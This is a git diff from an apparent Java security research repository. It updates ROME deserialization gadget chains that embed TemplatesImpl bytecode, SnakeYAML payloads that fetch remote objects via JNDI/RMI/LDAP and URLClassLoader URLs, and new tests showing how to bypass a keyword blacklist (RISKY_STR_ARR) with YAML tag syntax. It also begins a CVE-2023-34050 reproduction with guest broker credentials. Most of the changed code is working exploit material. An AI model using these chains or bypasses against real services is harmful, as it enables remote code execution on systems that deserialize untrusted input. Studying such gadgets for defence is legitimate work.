diff --git a/JavaSecurity/ROME/BasicRome/ser.bin b/JavaSecurity/ROME/BasicRome/ser.bin
index 32492e58..3c89e9a4 100644
Binary files a/JavaSecurity/ROME/BasicRome/ser.bin and b/JavaSecurity/ROME/BasicRome/ser.bin differ
diff --git a/JavaSecurity/ROME/BasicRome/src/main/java/RomEXP.java b/JavaSecurity/ROME/BasicRome/src/main/java/RomEXP.java
index d0e87ead..0e4f3b8b 100644
--- a/JavaSecurity/ROME/BasicRome/src/main/java/RomEXP.java
+++ b/JavaSecurity/ROME/BasicRome/src/main/java/RomEXP.java
@@ -2,12 +2,15 @@
 import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
 import com.sun.rowset.JdbcRowSetImpl;
 import com.sun.syndication.feed.impl.EqualsBean;
+import com.sun.syndication.feed.impl.ObjectBean;
 import com.sun.syndication.feed.impl.ToStringBean;
 import javassist.ClassPool;
 import javassist.CtClass;
 import javassist.CtConstructor;
+import org.apache.commons.collections4.functors.ConstantTransformer;
 
 import javax.management.BadAttributeValueExpException;
+import javax.xml.transform.Templates;
 import java.io.*;
 import java.lang.reflect.Field;
 import java.util.HashMap;
@@ -23,14 +26,17 @@ public static void main(String[] args) throws Exception{
 byte[] evil = getTemplatesImpl("Calc");
 byte[][] codes = {evil};
 byteCodesField.set(templates,codes);
-// templates.newTransformer();
- ToStringBean toStringBean = new ToStringBean(c,templates);
-// toStringBean.toString();
- Class toStringBeanEvil = toStringBean.getClass();
- EqualsBean equalsBean = new EqualsBean(toStringBeanEvil,toStringBean);
-// equalsBean.beanHashCode();
- HashMap hashMap = new HashMap();
- hashMap.put(equalsBean,"Drunkbaby");
+
+ ToStringBean toStringBean = new ToStringBean(Templates.class,new ConstantTransformer(1));
+ EqualsBean equalsBean = new EqualsBean(ToStringBean.class,toStringBean);
+
+ HashMap hashMap = new HashMap<strong>();
+ hashMap.put(equalsBean,"123");
+
+ //再改回正常的参数
+ Field field = toStringBean.getClass().getDeclaredField("_obj");
+ field.setAccessible(true);
+ field.set(toStringBean,templates);
 serialize(hashMap);
 unserialize("ser.bin");
 }
diff --git a/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/BadAttributeValueExpExceptionEXP.java b/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/BadAttributeValueExpExceptionEXP.java
index 66e01ae9..8c4d45ae 100644
--- a/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/BadAttributeValueExpExceptionEXP.java
+++ b/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/BadAttributeValueExpExceptionEXP.java
@@ -7,8 +7,10 @@
 import javassist.ClassPool;
 import javassist.CtClass;
 import javassist.CtConstructor;
+import org.apache.commons.collections4.functors.ConstantTransformer;
 
 import javax.management.BadAttributeValueExpException;
+import javax.xml.transform.Templates;
 import java.io.*;
 import java.lang.reflect.Field;
 import java.util.HashMap;
@@ -24,11 +26,15 @@ public static void main(String[] args) throws Exception{
 byte[] evil = getTemplatesImpl("Calc");
 byte[][] codes = {evil};
 byteCodesField.set(templates,codes);
-// templates.newTransformer();
- ToStringBean toStringBean = new ToStringBean(c,templates);
-// toStringBean.toString();
- Class toStringBeanEvil = toStringBean.getClass();
- BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(toStringBean);
+
+ ToStringBean toStringBean = new ToStringBean(Templates.class,templates);
+
+ BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
+ Class Bv = Class.forName("javax.management.BadAttributeValueExpException");
+ Field val = Bv.getDeclaredField("val");
+ val.setAccessible(true);
+ val.set(badAttributeValueExpException,toStringBean);
+
 serialize(badAttributeValueExpException);
 unserialize("ser.bin");
 }
diff --git a/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/HashTableEXP.java b/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/HashTableEXP.java
index 95172299..349f6f7a 100644
--- a/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/HashTableEXP.java
+++ b/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/HashTableEXP.java
@@ -7,7 +7,9 @@
 import javassist.ClassPool;
 import javassist.CtClass;
 import javassist.CtConstructor;
+import org.apache.commons.collections4.functors.ConstantTransformer;
 
+import javax.xml.transform.Templates;
 import java.io.*;
 import java.lang.reflect.Field;
 import java.util.HashMap;
@@ -25,12 +27,17 @@ public static void main(String[] args) throws Exception{
 byte[][] codes = {evil};
 byteCodesField.set(templates,codes);
 // templates.newTransformer();
- ToStringBean toStringBean = new ToStringBean(c,templates);
+ ToStringBean toStringBean = new ToStringBean(Templates.class,new ConstantTransformer(1));
 // toStringBean.toString();
 Class toStringBeanEvil = toStringBean.getClass();
 EqualsBean equalsBean = new EqualsBean(toStringBeanEvil,toStringBean);
 Hashtable hashtable= new Hashtable();
 hashtable.put(equalsBean,"Drunkbaby");
+
+ Field field = toStringBean.getClass().getDeclaredField("_obj");
+ field.setAccessible(true);
+ field.set(toStringBean,templates);
+
 serialize(hashtable);
 unserialize("ser.bin");
 
diff --git a/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/JdbcRowSetImplEXP.java b/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/JdbcRowSetImplEXP.java
index 200e1bcb..3d14d821 100644
--- a/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/JdbcRowSetImplEXP.java
+++ b/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/JdbcRowSetImplEXP.java
@@ -3,7 +3,9 @@
 import com.sun.rowset.JdbcRowSetImpl;
 import com.sun.syndication.feed.impl.EqualsBean;
 import com.sun.syndication.feed.impl.ToStringBean;
+import org.apache.commons.collections4.functors.ConstantTransformer;
 
+import javax.xml.transform.Templates;
 import java.io.*;
 import java.lang.reflect.Field;
 import java.util.HashMap;
@@ -16,13 +18,15 @@ public static void main(String[] args) throws Exception {
 String url = "ldap://127.0.0.1:1230/ExportObject";
 jdbcRowSet.setDataSourceName(url);
 
-
- ToStringBean toStringBean = new ToStringBean(JdbcRowSetImpl.class,jdbcRowSet);
+ ToStringBean toStringBean = new ToStringBean(Templates.class,new ConstantTransformer(1));
 EqualsBean equalsBean = new EqualsBean(ToStringBean.class,toStringBean);
 
 HashMap hashMap = new HashMap<strong>();
 hashMap.put(equalsBean, "123");
 
+ Field field = toStringBean.getClass().getDeclaredField("_obj");
+ field.setAccessible(true);
+ field.set(toStringBean,jdbcRowSet);
 serialize(hashMap);
 unserialize("ser.bin");
 }
diff --git a/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/ObjectBeanEXP.java b/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/ObjectBeanEXP.java
index 26dc7889..412bf3ea 100644
--- a/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/ObjectBeanEXP.java
+++ b/JavaSecurity/ROME/BasicRome/src/main/java/otherChains/ObjectBeanEXP.java
@@ -8,7 +8,9 @@
 import javassist.ClassPool;
 import javassist.CtClass;
 import javassist.CtConstructor;
+import org.apache.commons.collections4.functors.ConstantTransformer;
 
+import javax.xml.transform.Templates;
 import java.io.*;
 import java.lang.reflect.Field;
 import java.util.HashMap;
@@ -26,13 +28,17 @@ public static void main(String[] args) throws Exception{
 byte[] evil = getTemplatesImpl("Calc");
 byte[][] codes = {evil};
 byteCodesField.set(templates,codes);
-// templates.newTransformer();
- ToStringBean toStringBean = new ToStringBean(c,templates);
-// toStringBean.toString();
- Class toStringBeanEvil = toStringBean.getClass();
- ObjectBean objectBean = new ObjectBean(toStringBeanEvil,toStringBean);
- HashMap hashMap = new HashMap();
- hashMap.put(objectBean,"Drunkbaby");
+
+ ToStringBean toStringBean = new ToStringBean(Templates.class,new ConstantTransformer(1));
+ ObjectBean equalsBean = new ObjectBean(ToStringBean.class,toStringBean);
+
+ HashMap hashMap = new HashMap<strong>();
+ hashMap.put(equalsBean,"123");
+
+ //再改回正常的参数
+ Field field = toStringBean.getClass().getDeclaredField("_obj");
+ field.setAccessible(true);
+ field.set(toStringBean,templates);
 serialize(hashMap);
 unserialize("ser.bin");
 
diff --git a/JavaSecurity/ROME/BasicRome/target/classes/BetterRomEXP.class b/JavaSecurity/ROME/BasicRome/target/classes/BetterRomEXP.class
index 28ab3c24..812a5c95 100644
Binary files a/JavaSecurity/ROME/BasicRome/target/classes/BetterRomEXP.class and b/JavaSecurity/ROME/BasicRome/target/classes/BetterRomEXP.class differ
diff --git a/JavaSecurity/ROME/BasicRome/target/classes/META-INF/BasicRome.kotlin_module b/JavaSecurity/ROME/BasicRome/target/classes/META-INF/BasicRome.kotlin_module
deleted file mode 100644
index 70f0f69f..00000000
Binary files a/JavaSecurity/ROME/BasicRome/target/classes/META-INF/BasicRome.kotlin_module and /dev/null differ
diff --git a/JavaSecurity/ROME/BasicRome/target/classes/RomEXP.class b/JavaSecurity/ROME/BasicRome/target/classes/RomEXP.class
index 0a761fb0..dff7ef7f 100644
Binary files a/JavaSecurity/ROME/BasicRome/target/classes/RomEXP.class and b/JavaSecurity/ROME/BasicRome/target/classes/RomEXP.class differ
diff --git a/JavaSecurity/ROME/BasicRome/target/classes/TemplatesImplEXP.class b/JavaSecurity/ROME/BasicRome/target/classes/TemplatesImplEXP.class
index a6fd735e..c2240693 100644
Binary files a/JavaSecurity/ROME/BasicRome/target/classes/TemplatesImplEXP.class and b/JavaSecurity/ROME/BasicRome/target/classes/TemplatesImplEXP.class differ
diff --git a/JavaSecurity/ROME/BasicRome/target/classes/ToStringBeanEXP.class b/JavaSecurity/ROME/BasicRome/target/classes/ToStringBeanEXP.class
index 4041b8bb..560808ca 100644
Binary files a/JavaSecurity/ROME/BasicRome/target/classes/ToStringBeanEXP.class and b/JavaSecurity/ROME/BasicRome/target/classes/ToStringBeanEXP.class differ
diff --git a/JavaSecurity/ROME/BasicRome/target/classes/otherChains/BadAttributeValueExpExceptionEXP.class b/JavaSecurity/ROME/BasicRome/target/classes/otherChains/BadAttributeValueExpExceptionEXP.class
index f1b5d562..751a3096 100644
Binary files a/JavaSecurity/ROME/BasicRome/target/classes/otherChains/BadAttributeValueExpExceptionEXP.class and b/JavaSecurity/ROME/BasicRome/target/classes/otherChains/BadAttributeValueExpExceptionEXP.class differ
diff --git a/JavaSecurity/ROME/BasicRome/target/classes/otherChains/HashTableEXP.class b/JavaSecurity/ROME/BasicRome/target/classes/otherChains/HashTableEXP.class
index 76888514..63d453c8 100644
Binary files a/JavaSecurity/ROME/BasicRome/target/classes/otherChains/HashTableEXP.class and b/JavaSecurity/ROME/BasicRome/target/classes/otherChains/HashTableEXP.class differ
diff --git a/JavaSecurity/ROME/BasicRome/target/classes/otherChains/JdbcRowSetImplEXP.class b/JavaSecurity/ROME/BasicRome/target/classes/otherChains/JdbcRowSetImplEXP.class
index 3a870f01..2e562101 100644
Binary files a/JavaSecurity/ROME/BasicRome/target/classes/otherChains/JdbcRowSetImplEXP.class and b/JavaSecurity/ROME/BasicRome/target/classes/otherChains/JdbcRowSetImplEXP.class differ
diff --git a/JavaSecurity/ROME/BasicRome/target/classes/otherChains/ObjectBeanEXP.class b/JavaSecurity/ROME/BasicRome/target/classes/otherChains/ObjectBeanEXP.class
index 7684cdd6..2009bd96 100644
Binary files a/JavaSecurity/ROME/BasicRome/target/classes/otherChains/ObjectBeanEXP.class and b/JavaSecurity/ROME/BasicRome/target/classes/otherChains/ObjectBeanEXP.class differ
diff --git a/JavaSecurity/SnakeYaml/pom.xml b/JavaSecurity/SnakeYaml/pom.xml
index 3a9c907f..717d42bf 100644
--- a/JavaSecurity/SnakeYaml/pom.xml
+++ b/JavaSecurity/SnakeYaml/pom.xml
@@ -12,27 +12,33 @@
 <dependency>
 <groupid>org.yaml</groupid>
 <artifactid>snakeyaml</artifactid>
- <version>1.27</version>
+ <version>1.25</version>
 </dependency>
 <dependency>
- <groupid>commons-configuration</groupid>
- <artifactid>commons-configuration</artifactid>
- <version>1.10</version>
+ <groupid>commons-logging</groupid>
+ <artifactid>commons-logging</artifactid>
+ <version>1.2</version>
+ </dependency>
+ <dependency>
+ <groupid>com.unboundid</groupid>
+ <artifactid>unboundid-ldapsdk</artifactid>
+ <version>4.0.9</version>
+ <scope>test</scope>
 </dependency>
 <dependency>
 <groupid>org.springframework</groupid>
- <artifactid>spring-webmvc</artifactid>
- <version>5.3.16</version>
+ <artifactid>spring-beans</artifactid>
+ <version>5.0.2.RELEASE</version>
 </dependency>
 <dependency>
- <groupid>com.mchange</groupid>
- <artifactid>c3p0</artifactid>
- <version>0.9.5.2</version>
+ <groupid>org.springframework</groupid>
+ <artifactid>spring-context</artifactid>
+ <version>5.0.2.RELEASE</version>
 </dependency>
 <dependency>
- <groupid>org.apache.xbean</groupid>
- <artifactid>xbean-naming</artifactid>
- <version>4.20</version>
+ <groupid>org.springframework</groupid>
+ <artifactid>spring-core</artifactid>
+ <version>5.0.2.RELEASE</version>
 </dependency>
 </dependencies>
 
diff --git a/JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/JndiConfigurationEXP.java b/JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/JndiConfigurationEXP.java
index dc5c0797..65ebdd7e 100644
--- a/JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/JndiConfigurationEXP.java
+++ b/JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/JndiConfigurationEXP.java
@@ -8,7 +8,7 @@ public static void main(String[] args) {
 String payload = "!!org.apache.commons.configuration.ConfigurationMap " +
 "[!!org.apache.commons.configuration.JNDIConfiguration " +
 "[!!javax.naming.InitialContext [], " +
- "\"rmi://127.0.0.1:1099/Exploit\"]]: 1";
+ "\"rmi://127.0.0.1:1099/nprcsj\"]]: 1";
 Yaml yaml = new Yaml();
 yaml.load(payload);
 }
diff --git a/JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/SpringPropertyPathFactoryBeanEXP.java b/JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/SpringPropertyPathFactoryBeanEXP.java
index 6a983b1a..70989ebe 100644
--- a/JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/SpringPropertyPathFactoryBeanEXP.java
+++ b/JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/SpringPropertyPathFactoryBeanEXP.java
@@ -6,18 +6,11 @@
 public class SpringPropertyPathFactoryBeanEXP {
 public static void main(String[] args) {
 String payload = "!!org.springframework.beans.factory.config.PropertyPathFactoryBean\n" +
- " targetBeanName: \"ldap://localhost:1389/Exploit\"\n" +
+ " targetBeanName: \"rmi://127.0.0.1:1099/7dwqhm\"\n" +
 " propertyPath: Drunkbaby\n" +
 " beanFactory: !!org.springframework.jndi.support.SimpleJndiBeanFactory\n" +
- " shareableResources: [\"ldap://localhost:1389/Exploit\"]";
-
- String poc = "!!org.springframework.beans.factory.config.PropertyPathFactoryBean\n" +
- " targetBeanName: \"rmi://127.0.0.1:1099/Exploit\"\n" +
- " propertyPath: Drunkbaby\n" +
- " beanFactory: !!org.springframework.jndi.support.SimpleJndiBeanFactory\n" +
- " shareableResources: [\"rmi://127.0.0.1:1099/Exploit\"]";
-
+ " shareableResources: [\"rmi://127.0.0.1:1099/7dwqhm\"]";
 Yaml yaml = new Yaml();
- yaml.load(poc);
+ yaml.load(payload);
 }
 }
diff --git a/JavaSecurity/SnakeYaml/src/main/java/BypassAnalyze/bypassBlackList.java b/JavaSecurity/SnakeYaml/src/main/java/BypassAnalyze/bypassBlackList.java
new file mode 100644
index 00000000..c983cfb6
--- /dev/null
+++ b/JavaSecurity/SnakeYaml/src/main/java/BypassAnalyze/bypassBlackList.java
@@ -0,0 +1,40 @@
+package BypassAnalyze;
+
+
+import org.yaml.snakeyaml.Yaml;
+
+// 测试绕过一整段黑名单
+public class bypassBlackList {
+
+ private static final String[] RISKY_STR_ARR = {"ScriptEngineManager", "URLClassLoader", "!!",
+ "ClassLoader", "AnnotationConfigApplicationContext", "FileSystemXmlApplicationContext",
+ "GenericXmlApplicationContext", "GenericGroovyApplicationContext", "GroovyScriptEngine",
+ "GroovyClassLoader", "GroovyShell", "ScriptEngine", "ScriptEngineFactory", "XmlWebApplicationContext",
+ "ClassPathXmlApplicationContext", "MarshalOutputStream", "InflaterOutputStream", "FileOutputStream"};
+ public String yamlLoads(String payload) {
+
+ try {
+ for (String riskyToken : RISKY_STR_ARR) {
+ if (payload.contains(riskyToken)) {
+ System.out.println("can not has malicious remote script");
+ return "failed";
+ }
+ }
+ Yaml yaml = new Yaml();
+ yaml.loadAs(payload, Object.class);
+ } catch (Exception e) {
+ System.out.println("error");
+ }
+ return "over";
+ }
+
+ public static void main(String[] args) {
+ String payload = "!<tag:yaml.org,2002:org.springframework.beans.factory.config.propertypathfactorybean> \n" +
+ " targetBeanName: \"ldap://127.0.0.1:1389/dc=example,dc=com\"\n" +
+ " propertyPath: Drunkbaby\n" +
+ " beanFactory: !<tag:yaml.org,2002:org.springframework.jndi.support.simplejndibeanfactory> \n" +
+ " shareableResources: [\"ldap://127.0.0.1:1389/dc=example,dc=com\"]";
+ bypassBlackList bypassTest = new bypassBlackList();
+ bypassTest.yamlLoads(payload);
+ }
+}
diff --git a/JavaSecurity/SnakeYaml/src/main/java/BypassAnalyze/bypassTest.java b/JavaSecurity/SnakeYaml/src/main/java/BypassAnalyze/bypassTest.java
new file mode 100644
index 00000000..099b64b7
--- /dev/null
+++ b/JavaSecurity/SnakeYaml/src/main/java/BypassAnalyze/bypassTest.java
@@ -0,0 +1,40 @@
+package BypassAnalyze;
+
+
+import org.yaml.snakeyaml.Yaml;
+
+// 测试绕过 !!
+public class bypassTest {
+
+ private static final String[] RISKY_STR_ARR = {"ScriptEngineManager", "URLClassLoader", "!!",
+ "ClassLoader", "AnnotationConfigApplicationContext", "FileSystemXmlApplicationContext",
+ "GenericXmlApplicationContext", "GenericGroovyApplicationContext", "GroovyScriptEngine",
+ "GroovyClassLoader", "GroovyShell", "ScriptEngine", "ScriptEngineFactory", "XmlWebApplicationContext",
+ "ClassPathXmlApplicationContext", "MarshalOutputStream", "InflaterOutputStream", "FileOutputStream"};
+
+ public String yamlLoads(String payload) {
+
+ try {
+ if (payload.contains("!!")) {
+ System.out.println("can not has malicious remote script");
+ return "failed";
+ }
+ Yaml yaml = new Yaml();
+ yaml.loadAs(payload, Object.class);
+
+ } catch (Exception e) {
+ System.out.println("error");
+ }
+ return "over";
+ }
+
+ public static void main(String[] args) {
+ String payload = "!<tag:yaml.org,2002:org.springframework.beans.factory.config.propertypathfactorybean> \n" +
+ " targetBeanName: \"ldap://192.168.255.10:1389/tr7j8w\"\n" +
+ " propertyPath: Drunkbaby\n" +
+ " beanFactory: !<tag:yaml.org,2002:org.springframework.jndi.support.simplejndibeanfactory> \n" +
+ " shareableResources: [\"ldap://192.168.255.10:1389/tr7j8w\"]";
+ bypassTest bypassTest = new bypassTest();
+ bypassTest.yamlLoads(payload);
+ }
+}
diff --git a/JavaSecurity/SnakeYaml/src/main/java/BypassAnalyze/tag.java b/JavaSecurity/SnakeYaml/src/main/java/BypassAnalyze/tag.java
new file mode 100644
index 00000000..84093770
--- /dev/null
+++ b/JavaSecurity/SnakeYaml/src/main/java/BypassAnalyze/tag.java
@@ -0,0 +1,13 @@
+package BypassAnalyze;
+
+import org.yaml.snakeyaml.Yaml;
+
+public class tag {
+ public static void main(String[] args) {
+ String payload = "!<tag:yaml.org,2002:javax.script.scriptenginemanager> " +
+ "[!<tag:yaml.org,2002:java.net.urlclassloader> " +
+ "[[!<tag:yaml.org,2002:java.net.url> [\"http://localhost:1099\"]]]]\n";
+ Yaml yaml = new Yaml();
+ yaml.load(payload);
+ }
+}
diff --git a/JavaSecurity/SnakeYaml/src/main/java/SnakeYamlFix/SnakeYamlFix.java b/JavaSecurity/SnakeYaml/src/main/java/SnakeYamlFix/SnakeYamlFix.java
index 55e4d351..9110a1b6 100644
--- a/JavaSecurity/SnakeYaml/src/main/java/SnakeYamlFix/SnakeYamlFix.java
+++ b/JavaSecurity/SnakeYaml/src/main/java/SnakeYamlFix/SnakeYamlFix.java
@@ -1,18 +1,18 @@
-package SnakeYamlFix;
-
-import org.yaml.snakeyaml.Yaml;
-import org.yaml.snakeyaml.constructor.SafeConstructor;
-
-public class SnakeYamlFix {
- public static void main(String[] args) {
-
- String context = "!!javax.script.ScriptEngineManager [\n" +
- " !!java.net.URLClassLoader [[\n" +
- " !!java.net.URL [\"http://127.0.0.1:7777/yaml-payload-master.jar\"]\n" +
- " ]]\n" +
- "]";
- Yaml yaml = new Yaml(new SafeConstructor());
- yaml.load(context);
- }
-
-}
+//package SnakeYamlFix;
+//
+//import org.yaml.snakeyaml.Yaml;
+//import org.yaml.snakeyaml.constructor.SafeConstructor;
+//
+//public class SnakeYamlFix {
+// public static void main(String[] args) {
+//
+// String context = "!!javax.script.ScriptEngineManager [\n" +
+// " !!java.net.URLClassLoader [[\n" +
+// " !!java.net.URL [\"http://127.0.0.1:7777/yaml-payload-master.jar\"]\n" +
+// " ]]\n" +
+// "]";
+// Yaml yaml = new Yaml(new SafeConstructor());
+// yaml.load(context);
+// }
+//
+//}
diff --git a/JavaSecurity/SnakeYaml/target/classes/AvailableGadgets/JndiConfigurationEXP.class b/JavaSecurity/SnakeYaml/target/classes/AvailableGadgets/JndiConfigurationEXP.class
index 4bed0684..52290186 100644
Binary files a/JavaSecurity/SnakeYaml/target/classes/AvailableGadgets/JndiConfigurationEXP.class and b/JavaSecurity/SnakeYaml/target/classes/AvailableGadgets/JndiConfigurationEXP.class differ
diff --git a/JavaSecurity/SnakeYaml/target/classes/AvailableGadgets/SpringPropertyPathFactoryBeanEXP.class b/JavaSecurity/SnakeYaml/target/classes/AvailableGadgets/SpringPropertyPathFactoryBeanEXP.class
index 879340fe..a6cb0371 100644
Binary files a/JavaSecurity/SnakeYaml/target/classes/AvailableGadgets/SpringPropertyPathFactoryBeanEXP.class and b/JavaSecurity/SnakeYaml/target/classes/AvailableGadgets/SpringPropertyPathFactoryBeanEXP.class differ
diff --git a/JavaSecurity/SnakeYaml/target/classes/BypassAnalyze/bypassBlackList.class b/JavaSecurity/SnakeYaml/target/classes/BypassAnalyze/bypassBlackList.class
new file mode 100644
index 00000000..00bea030
Binary files /dev/null and b/JavaSecurity/SnakeYaml/target/classes/BypassAnalyze/bypassBlackList.class differ
diff --git a/JavaSecurity/SnakeYaml/target/classes/BypassAnalyze/bypassTest.class b/JavaSecurity/SnakeYaml/target/classes/BypassAnalyze/bypassTest.class
new file mode 100644
index 00000000..9730813a
Binary files /dev/null and b/JavaSecurity/SnakeYaml/target/classes/BypassAnalyze/bypassTest.class differ
diff --git a/JavaSecurity/SnakeYaml/target/classes/BypassAnalyze/tag.class b/JavaSecurity/SnakeYaml/target/classes/BypassAnalyze/tag.class
new file mode 100644
index 00000000..e44dae40
Binary files /dev/null and b/JavaSecurity/SnakeYaml/target/classes/BypassAnalyze/tag.class differ
diff --git a/JavaSecurity/SnakeYaml/target/classes/SnakeYamlFix/SnakeYamlFix.class b/JavaSecurity/SnakeYaml/target/classes/SnakeYamlFix/SnakeYamlFix.class
deleted file mode 100644
index 57e4ba35..00000000
Binary files a/JavaSecurity/SnakeYaml/target/classes/SnakeYamlFix/SnakeYamlFix.class and /dev/null differ
diff --git a/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/pom.xml b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/pom.xml
new file mode 100644
index 00000000..729040a9
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/pom.xml
@@ -0,0 +1,75 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>com.example</groupid>
+ <artifactid>Client</artifactid>
+ <version>0.0.1-SNAPSHOT</version>
+ <name>Client</name>
+ <description>Client</description>
+ <properties>
+ <java.version>1.8</java.version>
+ <project.build.sourceencoding>UTF-8</project.build.sourceencoding>
+ <project.reporting.outputencoding>UTF-8</project.reporting.outputencoding>
+ <spring-boot.version>2.6.13</spring-boot.version>
+ </properties>
+ <dependencies>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter</artifactid>
+ </dependency>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-amqp</artifactid>
+ </dependency>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-test</artifactid>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+ <dependencymanagement>
+ <dependencies>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-dependencies</artifactid>
+ <version>${spring-boot.version}</version>
+ <type>pom</type>
+ <scope>import</scope>
+ </dependency>
+ </dependencies>
+ </dependencymanagement>
+
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <version>3.8.1</version>
+ <configuration>
+ <source>1.8</source>
+ <target>1.8</target>
+ <encoding>UTF-8</encoding>
+ </configuration>
+ </plugin>
+ <plugin>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-maven-plugin</artifactid>
+ <version>${spring-boot.version}</version>
+ <configuration>
+ <mainclass>com.example.client.ClientApplication</mainclass>
+ <skip>true</skip>
+ </configuration>
+ <executions>
+ <execution>
+ <id>repackage</id>
+ <goals>
+ <goal>repackage</goal>
+ </goals>
+ </execution>
+ </executions>
+ </plugin>
+ </plugins>
+ </build>
+
+</project>
diff --git a/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/src/main/java/com/example/client/ClientApplication.java b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/src/main/java/com/example/client/ClientApplication.java
new file mode 100644
index 00000000..a36c5b9f
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/src/main/java/com/example/client/ClientApplication.java
@@ -0,0 +1,20 @@
+package com.example.client;
+import org.springframework.amqp.support.converter.MessageConverter;
+import org.springframework.amqp.support.converter.Jackson2JsonMessageConverter;
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+import org.springframework.context.annotation.Bean;
+
+@SpringBootApplication
+public class ClientApplication {
+
+ public static void main(String[] args) {
+ SpringApplication.run(ClientApplication.class, args);
+ }
+
+ @Bean
+ MessageConverter createMessageConverter() {
+ return new Jackson2JsonMessageConverter();
+ }
+
+}
diff --git a/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/src/main/java/com/example/client/service/MessagingService.java b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/src/main/java/com/example/client/service/MessagingService.java
new file mode 100644
index 00000000..c69069ca
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/src/main/java/com/example/client/service/MessagingService.java
@@ -0,0 +1,20 @@
+package com.example.client.service;
+
+import org.springframework.amqp.rabbit.core.RabbitTemplate;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.stereotype.Component;
+
+@Component
+public class MessagingService {
+ @Autowired
+ RabbitTemplate rabbitTemplate;
+
+ public void sendRegistrationMessage(RegistrationMessage msg) {
+ rabbitTemplate.convertAndSend("registration", "", msg);
+ }
+
+ public void sendLoginMessage(LoginMessage msg) {
+ String routingKey = msg.success ? "" : "login_failed";
+ rabbitTemplate.convertAndSend("login", routingKey, msg);
+ }
+}
diff --git a/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/src/main/resources/application.yml b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/src/main/resources/application.yml
new file mode 100644
index 00000000..345ce1da
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/src/main/resources/application.yml
@@ -0,0 +1,6 @@
+spring:
+ rabbitmq:
+ host: 192.168.80.139
+ port: 5672
+ username: guest
+ password: guest
\ No newline at end of file
diff --git a/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/src/test/java/com/example/client/ClientApplicationTests.java b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/src/test/java/com/example/client/ClientApplicationTests.java
new file mode 100644
index 00000000..8c347674
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Client/src/test/java/com/example/client/ClientApplicationTests.java
@@ -0,0 +1,13 @@
+package com.example.client;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.boot.test.context.SpringBootTest;
+
+@SpringBootTest
+class ClientApplicationTests {
+
+ @Test
+ void contextLoads() {
+ }
+
+}
diff --git a/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Server/pom.xml b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Server/pom.xml
new file mode 100644
index 00000000..ad8486cb
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Server/pom.xml
@@ -0,0 +1,72 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>com.example</groupid>
+ <artifactid>Server</artifactid>
+ <version>0.0.1-SNAPSHOT</version>
+ <name>Server</name>
+ <description>Server</description>
+ <properties>
+ <java.version>1.8</java.version>
